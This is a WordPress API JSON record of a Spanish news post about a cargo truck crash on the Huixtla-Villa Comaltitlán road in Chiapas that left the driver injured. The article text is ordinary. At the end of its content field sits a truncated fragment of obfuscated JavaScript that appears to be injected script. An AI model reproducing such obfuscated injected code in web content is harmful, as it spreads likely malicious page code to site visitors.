{"id":22666,"date":"2025-06-25T03:30:38","date_gmt":"2025-06-25T03:30:38","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=22666"},"modified":"2025-06-25T03:30:39","modified_gmt":"2025-06-25T03:30:39","slug":"accidente-en-el-tramo-huixtla-villa-comaltitlan-deja-un-lesionado-y-cuantiosos-danos-materiales","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=22666","title":{"rendered":"Accidente en el tramo Huixtla-Villa Comaltitl\u00e1n deja un lesionado y cuantiosos da\u00f1os materiales"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"577\" data-id=\"22667\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000188586-1024x577.jpg\" alt=\"\" class=\"wp-image-22667\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000188586-1024x577.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000188586-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000188586-768x433.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000188586.jpg 1200w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"577\" data-id=\"22668\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000188585-1024x577.jpg\" alt=\"\" class=\"wp-image-22668\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000188585-1024x577.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000188585-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000188585-768x433.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/06\/1000188585.jpg 1200w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 24 de junio del 2025. Tuxtla Guti\u00e9rrez.- Este martes por la tarde se registr\u00f3 un fuerte accidente en el tramo Huixtla- Villa Comaltitl\u00e1n dejando un Saldo de un herido y cuantiosos da\u00f1os materiales.<\/p>\n\n\n\n<p>Todo ocurri\u00f3 cuando un cami\u00f3n de transporte de mercanc\u00eda perdi\u00f3 el control choco contra el muro de metal y sali\u00f3 de la carretera quedando de lado.<\/p>\n\n\n\n<p>El chofer qued\u00f3 atrapado y fue rescatado por elementos de Protecci\u00f3n Civil.<\/p>\n\n\n\n<p>Finalmente el cami\u00f3n fue remolcado por una gr\u00faa y trasladado a un dep\u00f3sito para deslindar responsabilidades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 24 de junio del 2025. Tuxtla Guti\u00e9rrez.- Este martes por la tarde se registr\u00f3 un fuerte accidente en el tramo Huixtla- Villa Comaltitl\u00e1n dejando un Saldo de un herido y cuantiosos da\u00f1os materiales. Todo ocurri\u00f3 cuando un cami\u00f3n de transporte de mercanc\u00eda perdi\u00f3 el control choco contra el muro de metal &hellip;<\/p>\n","protected":false},"author":2,"featured_media":22669,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-22666","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22666","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=22666"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22666\/revisions"}],"predecessor-version":[{"id":22670,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22666\/revisions\/22670"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/22669"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=22666"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=22666"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=22666"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}